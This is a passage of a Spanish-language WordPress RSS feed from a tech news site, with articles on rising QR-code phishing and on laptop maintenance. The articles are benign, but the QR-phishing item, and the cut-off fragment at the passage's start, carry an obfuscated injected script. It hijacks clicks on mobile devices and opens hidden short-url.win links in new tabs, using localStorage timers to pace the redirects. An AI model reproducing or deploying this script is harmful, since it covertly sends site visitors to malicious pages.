Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/jbl-la-clave-para-disfrutar-musica-en-cualquier-lugar/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">99672</post-id>	</item>
		<item>
		<title>QR y phishing: Riesgos en aumento</title>
		<link>https://www.todoenunclick.com/qr-y-phishing-riesgos-en-aumento/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Wed, 26 Jun 2024 19:30:48 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[ciberataques]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[códigos QR]]></category>
		<category><![CDATA[dispositivos]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[seguridad]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=99019</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2024/06/person-scanning-qr-code-cafeteria.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="QR y phishing: Riesgos en aumento" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/06/person-scanning-qr-code-cafeteria.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/06/person-scanning-qr-code-cafeteria.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/06/person-scanning-qr-code-cafeteria.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/06/person-scanning-qr-code-cafeteria.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/06/person-scanning-qr-code-cafeteria.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/06/person-scanning-qr-code-cafeteria.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/06/person-scanning-qr-code-cafeteria.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>El uso de códigos QR en empresas, negocios y establecimientos se ha vuelto más frecuente en la actualidad, lo que ha generado un aumento significativo en ataques cibernéticos de suplantación de identidad o <em>phishing</em> a través de estos códigos durante el último año, según estudios <a href="https://blog.talosintelligence.com/talos-ir-quarterly-report-q4-2023/">recientes de Cisco Talos</a>.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El 97% de los trabajadores accede a sus cuentas laborales desde sus dispositivos personales, de acuerdo con el informe <a href="https://www.securitymagazine.com/articles/99722-report-97-of-executives-access-work-accounts-on-personal-devices">No (Cyber) Seguro para el Trabajo 2023</a>. Esto, a su vez, ha potenciado la probabilidad de ataques a nivel corporativo a través de códigos QR.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>“Los códigos QR pueden ser peligrosos porque permiten a los atacantes dirigir su ataque desde una computadora segura hacia el dispositivo móvil de la víctima. Estos dispositivos suelen tener menos protecciones de seguridad y contienen información confidencial que los atacantes buscan”, explicó Pablo Herrera, especialista en ciberseguridad de Cisco.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>“Las computadoras y dispositivos corporativos suelen tener herramientas de seguridad para detectar phishing y proteger a los usuarios de enlaces maliciosos. Pero al escanear un código QR malicioso desde un dispositivo personal, la seguridad se reduce, y no todas las soluciones de correo electrónico pueden detectar estos códigos como lo harían con archivos adjuntos maliciosos”, agregó.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Con el uso generalizado de los códigos QR, no solo en el ámbito laboral sino también en la rutina diaria de las personas para acceder a información de eventos, trámites o en restaurantes, la exposición de datos confidenciales por este medio se ha convertido en una amenaza real sin las medidas de seguridad adecuadas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Por tanto, Cisco les brinda a las organizaciones y a los usuarios algunos consejos para defenderse de este tipo de amenazas:</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>?&nbsp;&nbsp;&nbsp;&nbsp; Implementar una plataforma de administración de dispositivos móviles o herramientas de seguridad móvil en todos los dispositivos con acceso a la información corporativa.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>?&nbsp;&nbsp;&nbsp;&nbsp; Utilizar una solución de seguridad de correo electrónico capaz de detectar códigos QR maliciosos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>?&nbsp;&nbsp;&nbsp;&nbsp; Educar y capacitar al personal sobre los peligros de los ataques de phishing y el creciente uso de códigos QR en correos electrónicos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>?&nbsp;&nbsp;&nbsp;&nbsp; Adoptar protocolos de autenticación multifactor para prevenir el robo de credenciales.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Los ataques de <em>phishing</em> tradicionales utilizan correos electrónicos diseñados para engañar a los usuarios y hacer que abran archivos adjuntos o enlaces maliciosos, mientras que en los ataques con códigos QR, se inserta un código QR en el correo para que sea escaneado con un dispositivo móvil.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Este enlace puede llevar a una página falsa o descargar malware en el dispositivo. Por ello, es crucial verificar los correos electrónicos y los códigos QR antes de interactuar con ellos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>“Los ataques de phishing que aprovechan los códigos QR son preocupantes a nivel empresarial porque al utilizar&nbsp; dispositivos móviles como ingreso, las defensas pierden visibilidad y no pueden detectar códigos QR maliciosos. Por lo tanto, es fundamental que las organizaciones formen a sus empleados para prevenir este tipo de amenazas e implementen medidas de ciberseguridad más sólidas”, puntualizó Herrera.</p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/qr-y-phishing-riesgos-en-aumento/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">99019</post-id>	</item>
		<item>
		<title>¿Cómo el mantenimiento puede mejorar el rendimiento de los dispositivos?</title>
		<link>https://www.todoenunclick.com/como-el-mantenimiento-puede-mejorar-el-rendimiento-de-los-dispositivos/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Mon, 27 Nov 2023 14:37:22 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[Acer]]></category>
		<category><![CDATA[dispositivos]]></category>
		<category><![CDATA[mantenimiento]]></category>
		<category><![CDATA[pasos]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=95933</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2023/11/a-clean-workspace-equates-to-a-happy-1.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="¿Cómo el mantenimiento puede mejorar el rendimiento de los dispositivos?" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/11/a-clean-workspace-equates-to-a-happy-1.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/11/a-clean-workspace-equates-to-a-happy-1.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/11/a-clean-workspace-equates-to-a-happy-1.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/11/a-clean-workspace-equates-to-a-happy-1.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/11/a-clean-workspace-equates-to-a-happy-1.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/11/a-clean-workspace-equates-to-a-happy-1.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/11/a-clean-workspace-equates-to-a-happy-1.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>La mayoría de los trabajos de oficina implican 8 horas diarias de pantalla, por lo que mantener limpios los dispositivos es fundamental tanto desde el punto de vista higiénico como psicológico. Refrescarlos con regularidad también puede minimizar los efectos de su desgaste, aumentando la longevidad a largo plazo. </p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Pero ¿qué significa "limpiar" un dispositivo? Los pasos correctos no siempre se dan de forma intuitiva, y no podemos destruir un dispositivo que funciona perfectamente si el mantenimiento no se hace correctamente. En general, la limpieza de un dispositivo debe hacerse con cuidado, tanto en lo que se refiere al hardware como al software.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Con el tiempo, muchos dispositivos digitales de uso común en el lugar de trabajo albergan más gérmenes que la tapa del inodoro de la oficina. Por muy limpia que esté su oficina, es imposible evitar por completo el polvo y los residuos. No hay que descuidar la suciedad en el dispositivo, ya que puede causar daños permanentes en los componentes internos de la laptop.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“Si se acumulan durante mucho tiempo, el polvo y los residuos pueden, por desgracia, obstruir las rejillas de ventilación y los ventiladores de la laptop. Esto facilita el sobrecalentamiento y pueden producirse fallos en el hardware, como las unidades centrales de procesamiento y las unidades de procesamiento gráfico”</em>, explica Becket Barrionuevo, gerente de producto de Acer. Una oficina llena de polvo en los dispositivos también puede ser perjudicial para la salud, ya que los empleados inevitablemente inhalarían la suciedad durante horas y horas. Esto puede ser especialmente perjudicial para los alérgicos al polvo.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El polvo y la suciedad pueden eliminarse con aire comprimido pulverizado a una distancia de entre uno y tres centímetros del aparato (acercarse más puede crear una presión de aire más fuerte y dañar el interior del aparato). Estos pulverizadores no son difíciles de encontrar en Internet y se pueden adquirir a un bajo costo.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Actualmente, existen soluciones más avanzadas que también ayudan a eliminar el polvo de forma eficaz, sin mucho esfuerzo por parte del usuario. Por ejemplo, Acer ha incluido en sus líneas de laptops <a href="https://carvajalprteam.tr.pemsv01.net/c/eyJhIjoiY2FydmFqYWxwcnRlYW0iLCJtIjoibWFpbF9jbHBiZ2kweWh3dnhjMDkwNTNweXlyN2lmIiwibCI6ImxpbmtfMzRlMjU2ODVkYzc5ZjMyN2JmOWU1ZjQ2YmJiZDA4YThlZTg2M2MwMyIsImkiOltdLCJ1IjoiaHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj01Zy04VlI0ZVplNCZ1dG1fc291cmNlPXBlcmZpdCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj0yMy8xMSUyMC0lMjBBQ0VSJTIwLSUyMGxpbXBpZXphIiwiYyI6IiIsImgiOiI1MDdhZDkifQ">Acer DustDefender</a>. Cada tres horas, el ventilador está programado para expulsar el polvo invirtiendo la dirección del ventilador, lo que permite que el dispositivo se mantenga frío y alcance un rendimiento óptimo.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“No solo eso, tras un uso prolongado, no es raro que las pantallas acumulen suciedad o se emborronen. Una pantalla poco limpia no es ideal para la visualización y además puede afectar a la salud ocular. Sin embargo, las herramientas para limpiar la pantalla deben elegirse con cuidado, ya que un paño inadecuado puede dañar la superficie”</em>, añade Acer.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Los beneficios de un dispositivo mantenido</strong> </p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Aparte de los aspectos obvios de limpieza y salud, la limpieza física de los dispositivos conlleva beneficios adicionales para la empresa a largo plazo. Al mantener los dispositivos de trabajo en condiciones óptimas, las empresas pueden esperar una mayor vida útil de los dispositivos. Esto ayuda a reducir los residuos electrónicos y ahorra fondos en la sustitución de dispositivos. Por supuesto, los dispositivos que se mantienen en condiciones óptimas también pueden realizar tareas de forma más eficiente, consumir menos energía con el tiempo y presentar problemas de funcionalidad con menos frecuencia. Las laptops limpias también son estéticas y pueden crear una sensación de profesionalidad. Esto crea una buena impresión para los clientes y también puede aumentar la motivación de los empleados.</p>
<!-- /wp:paragraph -->

<!-- wp:image {"align":"center","id":95935,"sizeSlug":"full","linkDestination":"none","tdShowModal":true} -->
<div><a href="https://www.todoenunclick.com/wp-content/uploads/2023/11/travelmate-p4-14-tmp414-53lifestyle-2.jpg" class="td-modal-image"><figure class="wp-block-image aligncenter size-full"><img src="https://www.todoenunclick.com/wp-content/uploads/2023/11/travelmate-p4-14-tmp414-53lifestyle-2.jpg" alt="" class="wp-image-95935"/></figure></a></div>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p><strong>Mantenimiento digital: Es tan clave como la limpieza del hardware, y puede constar de los siguientes pasos:- Despejar los discos duros:</strong> </p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Los archivos en el trabajo pueden acumularse rápidamente con el tiempo. Un disco duro desordenado (especialmente uno con archivos desorganizados) puede reducir la eficiencia del trabajo y también impedir que una laptop funcione con eficacia. Por eso, revisar los archivos antiguos del disco duro y eliminar los obsoletos puede liberar espacio. Una buena regla general es mantener el disco duro al 80-85% y el SSD al 75% de su capacidad. Despejar los discos duros llevará algún tiempo, pero el esfuerzo merece la pena.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>- Actualizar el software con regularidad:</strong> El software desactualizado puede implicar brechas de ciberseguridad, por lo que es fundamental que los empleados actualicen su software con regularidad. El software actualizado también puede mejorar el rendimiento del dispositivo, por lo que hay pocas razones para no comprometerse con él. Su departamento de TI debería, casi siempre, encargarse de las actualizaciones de software, ya que pueden garantizar la compatibilidad con los sistemas existentes y mantener la seguridad de los datos. La gestión centralizada de las actualizaciones por parte de los profesionales de TI también evita posibles conflictos y garantiza versiones de software coherentes en toda la organización.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>- Búsqueda de virus y malware: </strong>Los virus informáticos y el malware avanzan y pueden provocar daños impensables en un dispositivo. Pueden hacer que los equipos se bloqueen o queden inutilizables. En otros casos, los virus y el malware pueden robar, borrar o cifrar datos confidenciales, lo que va en detrimento del funcionamiento básico de una empresa.<br><br><strong>Consejos para el mantenimiento de los dispositivos de trabajo</strong> La limpieza de los dispositivos debe hacerse con cuidado. De la mano de Acer te brinda algunas orientaciones sobre cómo hacerlo.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Limpieza del hardware</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>- Apagá y desenchufá el dispositivo antes de la limpieza física.</strong> Como la limpieza física puede implicar herramientas de limpieza ligeramente húmedas, es importante apagar y desenchufar el dispositivo por razones de seguridad. También puede evitar problemas como tropezar con los cables durante la limpieza.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>- Limpiá con la herramienta de limpieza adecuada.</strong> No existe una bayeta única para todos los dispositivos del mercado, y esto tiene que ver en gran medida con el <a href="https://carvajalprteam.tr.pemsv01.net/c/eyJhIjoiY2FydmFqYWxwcnRlYW0iLCJtIjoibWFpbF9jbHBiZ2kweWh3dnhjMDkwNTNweXlyN2lmIiwibCI6ImxpbmtfOGFhNzg5YTJiNWIxNGIyYmI0NWNlMTk5NTJhNDMyMGYyM2Q4MjI4ZSIsImkiOltdLCJ1IjoiaHR0cHM6Ly9ibG9nLmFjZXIuY29tL2VuL2Rpc2N1c3Npb24vMjg4L2hvdy10by1jbGVhbi15b3VyLXRlY2gtd2l0aG91dC1kYW1hZ2luZy1pdD91dG1fc291cmNlPXBlcmZpdCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj0yMy8xMSUyMC0lMjBBQ0VSJTIwLSUyMGxpbXBpZXphIiwiYyI6IiIsImgiOiJlMWQ2OTAifQ">tipo de pantalla</a> que tenga tu aparato. Las pantallas OLED, LCD o LED pueden sufrir consecuencias desastrosas si se limpian directamente con agua. <a href="https://carvajalprteam.tr.pemsv01.net/c/eyJhIjoiY2FydmFqYWxwcnRlYW0iLCJtIjoibWFpbF9jbHBiZ2kweWh3dnhjMDkwNTNweXlyN2lmIiwibCI6ImxpbmtfMzVhNmIxNjQ4NzllYjM3Yzg1NTFkMGY3ZmM4YmY0MjM0YTVkZDFiNiIsImkiOltdLCJ1IjoiaHR0cHM6Ly9ibG9nLmFjZXIuY29tL2VuL2Rpc2N1c3Npb24vNTM1L2Vhc3ktdGlwcy1mb3ItYS1zcG90bGVzcy1jb21wdXRlci1zY3JlZW4_dXRtX3NvdXJjZT1wZXJmaXQmdXRtX21lZGl1bT1lbWFpbCZ1dG1fY2FtcGFpZ249MjMvMTElMjAtJTIwQUNFUiUyMC0lMjBsaW1waWV6YSIsImMiOiIiLCJoIjoiYWYzYTdhIn0">Los productos</a> que contienen acetona, amoníaco, ácido etílico, alcohol etílico, alcohol metílico, cloruro de metilo y tolueno también suelen ser perjudiciales para los dispositivos digitales, por lo que se debe tener precaución al considerar este tipo de herramientas para la limpieza. Por lo tanto, es importante consultar primero el manual del producto antes de realizar cualquier limpieza. Sin embargo, en general, se puede utilizar alcohol isopropílico para los teclados, y los paños de microfibra deberían ser seguros para limpiar las pantallas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para la limpieza interna, déjalo en manos de los informáticos. Dejar que los profesionales informáticos se encarguen de la limpieza interna de los sistemas garantiza la seguridad e integridad de los delicados componentes internos, evita posibles pérdidas de datos y mantiene la garantía del dispositivo. Su experiencia evita daños accidentales y garantiza el uso de métodos de limpieza adecuados. Confiar esta tarea a los informáticos no sólo prolonga la vida útil del equipo, sino que también salvaguarda los datos y las inversiones críticas de la empresa.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Limpieza digital</strong></p>
<!-- /wp:paragraph -->

